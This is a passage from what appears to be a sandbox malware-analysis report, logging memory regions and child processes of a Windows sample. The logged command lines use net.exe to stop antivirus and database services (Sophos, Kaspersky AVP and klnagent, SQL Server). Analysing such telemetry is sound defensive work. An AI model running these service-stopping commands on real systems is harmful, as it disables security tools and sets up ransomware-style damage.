[0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13453 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13454 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13455 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13456 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 13457 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13458 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13459 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13460 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13461 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13462 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13463 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13464 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13665 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13666 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13667 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 13668 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13669 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13670 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13671 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 941 os_tid = 0x13dc Process: id = "390" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6a008000" os_pid = "0xf5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$SOPHOS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13465 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13466 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13467 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13468 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 13469 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13470 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13471 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13472 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13473 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13474 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13475 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13476 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13477 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13478 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13479 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 13480 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13481 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13482 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13483 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 943 os_tid = 0xae0 Process: id = "391" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x78d27000" os_pid = "0xcf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$SOPHOS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13484 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13485 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13486 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13487 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 13488 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13489 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13490 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13491 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13492 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13493 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13494 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 13495 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13496 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13497 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13498 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 13499 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13500 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13501 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13502 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 945 os_tid = 0xd34 Process: id = "392" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x9147000" os_pid = "0x1258" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop AVP /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13503 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13504 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 13505 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 13506 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 13507 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13508 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13509 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13510 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13511 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13512 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13513 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 13514 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13515 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13516 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13517 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13518 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13519 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13520 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13521 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 947 os_tid = 0xd1c Process: id = "393" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x74b67000" os_pid = "0xd20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop klnagent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13522 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13523 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13524 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13525 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 13526 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13527 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13528 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13529 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13530 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13531 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13532 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 13533 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13534 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13535 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13536 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 13537 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13538 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13539 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13540 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13798 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13799 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 13800 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13801 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13802 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 13803 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 13804 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 13805 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13806 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13807 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13808 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13809 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13810 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13811 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13812 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13813 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 949 os_tid = 0xce4 Process: id = "394" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x78587000" os_pid = "0x288" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$SQLEXPRESS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13541 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13542 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13543 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13544 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 13545 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13546 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13547 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13548 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13549 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13550 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13551 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13552 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13553 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13554 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13555 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 13556 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13557 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13558 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13559 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 951 os_tid = 0x5f0 Process: id = "395" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x7791b000" os_pid = "0xf34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "390" os_parent_pid = "0xf5c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SOPHOS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13560 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13561 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13562 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13563 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13564 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = 